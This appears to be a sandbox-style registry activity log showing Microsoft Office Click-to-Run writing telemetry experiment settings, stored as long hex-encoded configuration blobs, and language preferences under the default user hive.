Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}\ApplicationFlags = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.9 = 5c224576656e74466c61675c22203a20323536207d2c205c225461736b70616e65417070436d64496e7374616c6c6174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2255585c22203a207b205c224576656e74735c22203a207b205c224c61756e63684f6d657853534f436f6e73656e744469616c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416761766555784d696e6f72426c6f636b65645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2241707044656c6574656446726f6d446f63756d656e745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224469616c6f67436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224469616c6f674f70656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253686f77496e666f626172436f6e73656e74566965775c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253686f774c6f6164696e6753746174655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253686f775265616374566965775c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22416464696e50726566657463685c22203a207b205c224576656e74735c22203a207b205c22507265666574636849636f6e735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22507265666574636855726c5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225072656c6f61644d616e69666573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253616e64626f78507265666574636855726c5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2241637469766174696f6e5c22203a207b205c224576656e74735c22203a207b205c224352656d6f74657250726f78795c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2253696e676c655369676e4f6e5c22203a207b205c224576656e74735c22203a207b205c22446973706c617953534f436f6e73656e7450616765466f7241706943616c6c5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224578656375746547657453534f546f6b656e496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2247657441757468546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d2c205c224576656e74735c22203a207b205c224f445041637469766174696f6e466f7254616761353572735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f4450417070436f6d6d616e64735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434f4d416464696e4f7065726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f4450417070436f6d6d616e647343616368655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f4450417070436f6d6d616e6473496e7374616c6c54696d655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f4450417070436f6d6d616e6473526962626f6e436c69636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224557534c69626c657443616c6c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446565704c696e6b696e67436865636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446565704c696e6b696e67446f63756d656e744f70656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446565704c696e6b696e67446f63756d656e7453686f77547275737455495c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446565704c696e6b696e675472757374526573756c745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224577734c6173745570646174655374617475734974656d436c69636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224577734c6173745570646174655374617475734974656d53686f776e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2247656e314163746976697479416767726567617465644261736553756272756c655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2247656e314163746976697479416767726567617465644661696c757265436f756e745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2247656e3141637469766974794167677265676174656453756363657373436f756e74576974685461675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f44504170704d616e6167656d656e744d656e755c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f4450496e73657274696f6e4469616c6f675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f445050617273654e65774d616e69666573744572726f725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f44505265636f6d6d656e64656447616c6c657279436c69636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f4450526962626f6e427269646765526962626f6e436c69636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f445053616e64626f7841637469766174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f45504d616e696665737450617273696e675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22526962626f6e427574746f6e436c69636b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253746f7265557365725374617475735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253746f7265557365725374617475734572726f725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f445041637469766174696f6e466f7254616761353572715c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f44504c6174656e63795c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e466565646261636b222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c2253617665526573706f6e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e46696c65494f222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224353495c22203a207b205c224576656e74735c22203a207b205c225265717565737441646170746572556e657870656374656443616c6c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416d49416c6f6e6550726f63657373526573706f6e73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e73616374656453747265616d446174615570646174655472616e73616374696f6e436f6d6d69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e73616374656453747265616d446174614d657267655472616e73616374696f6e436f6d6d69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224343616368656446696c655363686564756c6546696c6555706c6f6164526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243656c6c53746f726167654f6e426c6f624865617052657175657374526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243656c6c53746f726167654f6e426c6f624865617052657175657374526573756c74434d555c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e49734f6e6c79436c69656e7452657175657374436f6d706c6574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22437369446176436c69656e7453656e64526571756573745374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574446f63756d656e7446726f6d55726c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224343616368656446696c654373694c6f616446696c655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224343616368656446696c654373695361766546696c655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22446f63756d656e74466163746f72794372656174654e6577446f63756d656e745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22446f63756d656e7452656e616d655375626d6974576f726b4974656d5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22464d617050617468735c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22476574536861726555726c466f72436f6e7461696e65724173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22476574536861726555726c466f7246696c654173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22476574576f706955726c46726f6d46696c654964656e7469666965724173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2249446f63756d656e7447657456657273696f6e4c6973745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2249446f63756d656e74526573746f72654173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224973446f776e6c6f616465644261736556616c69644e6f48617368436865636b5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253796e634261636b65645265636f6e63696c65725472795265636f6e63696c65546f4c6174657374416674657256657273696f6e4e6f74466f756e645c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253796e634261636b65645265636f6e63696c65725472616e736974696f6e4f6e6c696e655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2254727944657374726f794f666669636546696c6543616368655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22576f706942726f77736542726f777365546f436f6e7461696e65724173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d207d2c205c225375624e616d657370616365735c22203a207b205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2243616368654f70746963735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f7074696373446f776e6c6f61644572726f72446973747269627574696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f7074696373446f776e6c6f61644572726f72446973747269627574696f6e7337446179735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f70746963734572726f72735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637346696c6553746f726546696c6553697a65446973747269627574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637355706c6f61644572726f72446973747269627574696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637355706c6f61644572726f72446973747269627574696f6e7337446179735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f7074696373576f726b696e67436f707946696c6553697a65446973747269627574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656d6f766546696c65456e7472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637350657246696c655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253746172744f666669636546696c6543616368655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d2c205c225375624e616d657370616365735c22203a207b205c2243656e7472616c5461626c655c22203a207b205c224576656e74735c22203a207b205c22436865636b536368656d6156657273696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22436c65617243616368655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22437265617465446174616261736546696c655573696e6754656d706c6174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2243726561746544617461536f757263654661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2244617461736f757263654f70656e4661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2246696c65436163686550726f70657274696573526f774e6f74466f756e645c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d69677261746546696c654e616d6546726f6d496e695c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22526f77736574556e6b6e6f776e4661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22536368656d61557067726164655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224661756c744d616e6167656d656e745c22203a207b205c224576656e74735c22203a207b205c224661756c745265636f766572795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224661756c745265706f72745c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d2c205c2250726f746f636f6c5061727365725c22203a207b205c224576656e74735c22203a207b205c2250617273655572695c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7061636b55726c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496672496e697441726773576f72645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248724c61756e636855726c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22464c6f6164436d644c696e65436f72655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2250726f746f636f6c48616e646c65725c22203a207b205c224576656e74735c22203a207b205c225472794f70656e696e674c6f7248797065724c696e6b496e4e6174697665436c69656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f746f636f6c48616e646c65724d61696e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22556e7061636b4c696e6b5c22203a207b205c224576656e74735c22203a207b205c22556e7061636b4c696e6b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7061636b4c696e6b4173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7061636b4c696e6b5769746848696e745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225254435c22203a207b205c224576656e74735c22203a207b205c2246696e6453657373696f6e456e64706f696e7452756e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e74536861726555726c5c22203a207b205c224576656e74735c22203a207b205c22556e7061636b536861726555726c416e6448616e646c65526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e556e7061636b55726c436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486c696e6b5c22203a207b205c224576656e74735c22203a207b205c224d736f4872486c696e6b43726561746546726f6d537472696e675c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d534f5c22203a207b205c224576656e74735c22203a207b205c22434d736f4f4c446f634e657744657374727563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f63616c446f63756d656e74496e666f557073656c6c4576656e745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f63616c446f63756d656e74496e666f466c796f757444726f707065645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2248616e646c65417574684661696c7572655f5573654578697374696e6743726564735f47656e657269634661696c7572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f4f4c446f6342617365476574504b4d436c69656e7445785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f536572766572496e666f476574536572766572496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745265636f766572794872476574447270436f72655c22203a207b205c224576656e74466c61675c22203a2032207d C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.11 = 6561745c22203a207b205c224576656e74735c22203a207b205c22577269746543616368655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265616443616368655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c6f61644c6963656e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246756c6c56616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c6f61644c6963656e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2250726f706572746965735c22203a207b205c224576656e74735c22203a207b205c224765744c6963656e736543617465676f72795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f6b656e697a654c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174654c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224272616e64696e675c22203a207b205c224576656e74735c22203a207b205c2247657441707056616c75655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657450726f6475637456616c75655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253686f756c645573654d6963726f736f66743336354272616e64696e675c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2254656e616e745c22203a207b205c224576656e74735c22203a207b205c22496e697454656e616e7449645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224e756c5c22203a207b205c225375624e616d657370616365735c22203a207b205c22466574636865725c22203a207b205c224576656e74735c22203a207b205c224765744e756c4f626a656374466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2246657463684d6f64656c46726f6d4f6c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224765744c6963656e73654665617475726573466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243726561746552657175657374426f64795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f64656c5c22203a207b205c224576656e74735c22203a207b205c224765744c6963656e736543617465676f72795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22476574416c6c4c6963656e736543617465676f726965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446573657269616c697a655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225061727365526177526573706f6e73655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243616e52756e46656174757265526573756c74735c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224d6f64655c22203a207b205c224576656e74735c22203a207b205c224765744d6f64655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224170695c22203a207b205c224576656e74735c22203a207b205c22437265617465526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e64526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656365697665526573706f6e73655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2247657453746f72616765506174685c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61644d6f64656c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22476574556e766572696669656453746f72616765506174685c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61644d6f64656c5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656e616d6546696c65546f55736555706461746564486173685c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2256616c69646174696f6e5c22203a207b205c224576656e74735c22203a207b205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2256616c696461746f725c22203a207b205c224576656e74735c22203a207b205c224d61746368696e67486172776172656449645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c22466c6f77735c22203a207b205c224576656e74735c22203a207b205c22536561726368466f72534341546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4d6f786965222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74466c61675c22203a203438383936207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4f6666696365222c20225622203a20227374643a3a77737472696e677c7b205c224c6f636b65645c22203a2066616c73652c205c225375624e616d657370616365735c22203a207b205c224e61747572616c4c616e67756167655c22203a207b205c224c6f636b65645c22203a2066616c73652c205c225375624e616d657370616365735c22203a207b205c224372697469717565735c22203a207b205c224c6f636b65645c22203a2066616c73652c205c224576656e74735c22203a207b205c2250726f636573734175676c6f6f704372697469717565735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f636573734175676c6f6f7041646443726974697175655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4f75746c6f6f6b222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224465736b746f705c22203a207b205c225375624e616d657370616365735c22203a207b205c2253796e635c22203a207b205c224576656e74735c22203a207b205c2253796e6350757267654f66666c696e654974656d735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2256696577735c22203a207b205c224576656e74735c22203a207b205c224872566965774c6f6164436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22566965774d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e506572736f6e616c697a6174696f6e222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2246696c65496e736967687443616368654d616e616765725c22203a207b205c224576656e74735c22203a207b205c2250757267654578706972656443616368655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225369676e616c50726f636573736f725c22203a207b205c224576656e74735c22203a207b205c2253656e645369676e616c5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e50726f6772616d6d6162696c697479222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2254656c656d657472795c22203a207b205c224576656e74735c22203a207b205c22446e61416464496e4c6f6164586c6c46696c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446e61416464496e4c6f616445787465726e616c446c6c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446e61416464496e4c6f6164446e6146696c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e43726173685c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22416464696e735c22203a207b205c224576656e74735c22203a207b205c22417070416464496e4c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22417070416464496e55736167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e446f634c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7465726e616c536574436f6e6e6563745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e5365637572697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436c70547279557067726164654c6162656c4661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c705c22203a207b205c224576656e74735c22203a207b205c224c6162656c55736167655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f7574636f6d6555736167655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f66666963654a534765744c6162656c44657461696c735c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22436c70506f6c696379466574636843616c6c4261636b537563636573735c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d616e6461746f72794c6162656c6c696e674469616c6f675c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c4765744c6162656c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c5365744c6162656c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224f626a6563744d6f64656c506f6c696379436f6d706c657465496e697469616c697a655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253656c6563744a757374696669636174696f6e4f7074696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253656e7369746976697479466c796f7574416e63686f72547261636b416e645265766f6b65427574746f6e436c69636b5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225265676973746572446f63756d656e745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2246657463684c6162656c7346726f6d5365727665725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657444656661756c744c6162656c49445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744c6162656c735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744f7574636f6d6573466f724c6162656c4368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f6e506f6c6963794d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f6e5265706c79466f72776172645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250726f6365737341756469744f70656e48656c7065725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f506f6c6963794d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f4c6162656c416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744175646974496e666f46696c65416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6162656c696e67457870657269656e63655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224164644c6162656c4f627365727665725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656d6f76654c6162656c4f627365727665725c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c705c22203a207b205c224576656e74735c22203a207b205c22446b6550726f746563746564436f6e74656e745c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6163726f5c22203a207b205c224576656e74735c22203a207b205c22426c6f636b4d6163726f46726f6d496e7465726e6574506f6c69637953657474696e675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22456e636f756e74657265645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22456e61626c65645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2246696c65426c6f636b5c22203a207b205c224576656e74735c22203a207b205c2246696c65426c6f636b496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c224f43585c22203a207b205c224576656e74735c22203a207b205c2254727573746564456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224e6f6e54727573746564456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22416363657373456e636f756e7465725c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22426c6f636b6564657874656e73696f6e735c22203a207b205c224576656e74735c22203a207b205c2246696c65457874656e73696f6e4c69737446726f6d536572766963655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22536563757265526561646572486f73745c22203a207b205c224576656e74735c22203a207b205c224f70656e496e4f53525c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54617267657465644d6573736167696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224275736261725468656d6553656c656374696f6e5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54656c656d65747279222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436c69656e7453616d706c696e674f76657272696464656e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253797374656d4865616c74684d657461646174614e6574776f726b436f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224576656e7451756172616e74696e65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164586d6c52756c65735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2250726f6365737349646c6551756575654a6f625c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22466c7573684576656e744275666665725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2254656c656d6574727953656e74696e656c56616c75655c22203a207b205c224576656e74466c61675c22203a2030207d207d2c205c224c6f636b65645c22203a2066616c7365207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54656c6c4d65222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c2254656c6c4d655741435c22203a207b205c224576656e74735c22203a207b205c225175657279526573706f6e73655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e54657874222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c225265736f75726365436c69656e745c22203a207b205c224576656e74735c22203a207b205c22446573657269616c697a655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656164466f6e74456c656d656e74735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2250757267654d756c7469706c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561645265736f757263654d657461446174615c22203a207b205c224576656e74466c61675c22203a20 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
